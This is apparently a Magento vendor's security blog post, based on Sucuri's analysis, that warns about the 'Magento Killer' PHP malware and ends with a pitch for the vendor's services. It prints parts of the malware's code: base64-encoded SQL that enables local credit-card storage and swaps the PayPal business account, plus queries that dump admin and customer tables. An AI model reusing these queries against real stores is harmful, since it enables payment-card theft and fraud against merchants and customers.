Is Your Magento Store Safe from Magento Killer?
A critical security flaw was identified in March, affecting Magento 2.x eCommerce stores. It is a new malicious script creating a buzz within the Magento community. “Magneto Killer” as coined by its creator(s) is a malicious PHP script targeting Magento websites, compromising the security of payment detail data, subsequently making this data highly susceptible to theft.
As suggested in the name the script does not kill or modify the Magento installation but rather allows modification to be made to the core_config_data table of the compromised Magento database.
How Attackers Get Access to Steal Payment Info:
They use $ConfKiller operation to steal payment info. During the initial stage of the attack, a special SQL query is encoded in base64 by the attacker.
Sucuri has decoded these strings under their respective lines in the sample below for your reference.
$ConfKiller = array( 'Update DB (Savecc)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='), //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active'; 'Update PP (MailPP)' => base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7') //UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';
If you are a programmer, you can understand the code. If you are a merchant, you can always enlist help from Magento Maintenance experts to evaluate, and ensure your Magento website is safe from vulnerabilities and attack.
The following two objects within the $ConfKiller variable’s array are accountable for the following malicious operations.
- Update DB (Savecc): Configures the Magento website to save client credit card information on the server, instead of sending it to the typical destination — a payment processor (e.g authorize.net).
- Update PP (MailPP): Changes the PayPal merchant business account associated with the Magento site to whatever the hacker wants.
As stated by sucuri.net.
Of course, Magento encrypts the locally saved credit card information, but this encryption is not sufficient for this particular scenario, where attackers are able to steal and decrypt stored credit card info. Moreover, once this data is captured it can then be used egregiously as the attacker have direct access to the website’s filesystem.
Hackers Use SQL Queries to Sync the Data with Credit Card Info:
In order to use stolen credit card information, the hacker must capture and sync customers information from the Magento database. Once credit card data is captured, they hacker perform a data overlay matching customers name, email IDs, physical mailing address, essentially all billing information associated with the stolen credit card.
To steal this additional information, they create another variable array used in their SQL queries from the injected Magento database:
$query = array( 'admin_user' => 'SELECT * FROM admin_user' , 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' , 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' , 'customer_entity' => 'SELECT * FROM customer_entity' ,
The array listing then pulls any customer info stored in the most common Magento database tables (e.g customer_entity, newsletter_subscriber).
After that, it trims the data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing relevant customer information.
Expert Magento Programmers can quickly identify malicious scripts, ensuring Magento websites are secure against this aggressive, malicious Magneto Killer code. Magento merchants are urged not to take this attack lightly and are advised to promptly have their store(s) evaluated for and secured against Magneto Killer, as once their site is infected their customers data will rapidly become compromised, tarnishing the trust customers have in their business, and transacting on their store!
If you are not updated to the latest version of Magento or believe your Magento store(s) may be at risk or are currently under attack. Contact our team of certified Magento experts to evaluate update and secure your website today!
Want to get in touch with us?
- What is AMP and How to Make Your Website AMP Ready?
- Magento Commerce 2.3.3 and Security-Only Patch 2.3.2-p1 - Begin Your Upgrades Now!
- Magento Commerce 2.2.X Is Nearing the End of Support, It Is Time to Upgrade!
- Is Your Magento Store Safe from Magento Killer?
- Are you running a Magento 2.x Store? Are your security Patches up to date?